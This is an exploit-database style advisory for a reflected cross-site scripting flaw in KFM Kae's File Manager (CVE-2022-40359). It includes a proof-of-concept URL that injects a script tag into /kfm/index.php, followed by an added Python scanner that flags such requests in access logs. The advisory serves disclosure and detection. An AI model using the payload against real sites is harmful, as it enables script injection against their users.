KFM Kae's File Manager - ALL - Reflected Cross-Site Scripting (XSS)

CVE: CVE-2022-40359
Category: CWE-79
Price: N/A
Severity: High
Author: kfm-kae-039
Risk: High
Exploitation Type: Remote
Date: 2022-09-22
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022090057

Below is a copy:

# Exploit Title: KFM Kae's File Manager - ALL - Reflected Cross-Site Scripting (XSS)
# Exploit Author: Scott Sturrock 'ssturrock -at- protonmail -dot- com'
# Vendor Homepage: https://code.google.com/archive/p/kfm/downloads
# Software Link: https://code.google.com/archive/p/kfm/downloads
# Version: ALL
# Tested on: Linux, Windows
# CVE : CVE-2022-40359

Reflected cross-site scripting (XSS) vulnerability in KFM through 1.4.7, triggered via a crafted GET request to /kfm/index.php.

Visit the PoC URL in a browser:
https://{URL}/kfm/index.php/'%3CSCRIPT%3Ealert('XSS');%3C/SCRIPT%3E
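
A detection sketch for the request shape in the PoC above, added here as an example and not part of the original advisory: it scans access-log lines for requests to /kfm/index.php whose trailing path info decodes to markup characters. The combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Client IP and request target from a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Extra path info appended after the script name, as in the PoC URL.
PATHINFO_RE = re.compile(r"/kfm/index\.php/(?P<extra>.*)", re.IGNORECASE | re.DOTALL)
MARKUP_CHARS = set("<>\"'")

# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Sep/2022:10:00:01 +0000] "GET /kfm/index.php HTTP/1.1" 200 5120',
    "192.0.2.44 - - [22/Sep/2022:10:00:07 +0000] \"GET /kfm/index.php/'%3CSCRIPT%3Ealert('XSS');%3C/SCRIPT%3E HTTP/1.1\" 200 5300",
    '192.0.2.45 - - [22/Sep/2022:10:00:09 +0000] "GET /kfm/index.php/%253Cb%253E HTTP/1.1" 200 5200',
]


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded markup (%253C) is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def check_line(line):
    """Return (client_ip, decoded_path_info) for a suspicious request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    path = m.group("target").split("?", 1)[0]  # this check only looks at the path
    info = PATHINFO_RE.search(fully_decode(path))
    if info and MARKUP_CHARS & set(info.group("extra")):
        return m.group("ip"), info.group("extra")
    return None


def scan(lines):
    """Collect every suspicious hit from an iterable of log lines."""
    return [hit for hit in map(check_line, lines) if hit]


if __name__ == "__main__":
    for ip, extra in scan(SAMPLE_LOG):
        print(f"{ip}: markup in path info after /kfm/index.php: {extra!r}")
```
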
